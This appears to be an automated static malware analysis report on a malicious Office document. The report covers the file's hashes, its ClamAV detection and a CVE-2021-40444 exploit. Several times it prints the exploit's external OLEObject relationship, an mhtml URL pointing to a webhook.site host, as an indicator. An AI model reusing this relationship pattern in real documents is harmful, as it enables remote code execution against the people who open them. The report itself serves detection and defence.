Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5823d05514a43cf1…

MALICIOUS

Office (OOXML)

1004.4 KB Created: 2017-08-02 11:09:18 UTC First seen: 2021-09-22
MD5: 6cca5e3de0dce2fc4e0e25076ceddcfd SHA-1: f7b4ba1cd25eeb3ab16c4a51f75cd84e8e4d8915 SHA-256: 5823d05514a43cf17b30451efcc5869757505413d7e6b8668b92d3574e4ee7a8
142 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This Office document was flagged as malicious by ClamAV. The file embeds external URLs that direct users to attacker-controlled resources. Specific URLs and indicators for this sample are listed in the indicators section.

Heuristics 4

  • External OLEObject gadget — CVE-2021-40444 critical CVE exact CVE_2021_40444
    External relationship to mhtml:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://we — exploitable external OLEObject gadget pattern for CVE-2021-40444
  • ClamAV: Doc.Exploit.CVE-2021-40444-9891698-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Exploit.CVE-2021-40444-9891698-2
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: mhtml:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://we OOXML external relationship
    • https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46OOXML external relationship
    • https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2aaccf46!x-usc:https://webhook.site/9635ea0e-3889-4e59-a915-b7cf2OOXML external relationship